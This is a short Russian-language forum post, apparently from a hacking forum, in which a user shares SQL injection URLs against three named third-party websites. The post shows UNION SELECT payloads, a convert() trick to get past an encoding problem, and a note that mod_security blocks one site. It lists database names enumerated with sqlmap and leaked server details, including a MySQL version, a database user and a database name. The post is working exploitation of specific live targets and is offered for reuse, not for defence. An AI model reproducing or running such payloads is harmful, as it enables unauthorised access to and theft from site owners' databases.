31.08.2015, 21:26
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Код:
http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--
использовал вкупе с sqlmap
[*] information_schema
[*] KoreaMed
[*] test
Адовое количество таблиц, возиться не стал.
Код:
http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
режет mod_secure
Код:
http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Проблема с кодировкой, неверно выводит и просто вывести version() нельзя. Нужно воспользоваться фукцией convert()
convert(version()+using+latin1)
в итоге есть:
4.1.14::soundman@localhost::RiddimDB |
|
|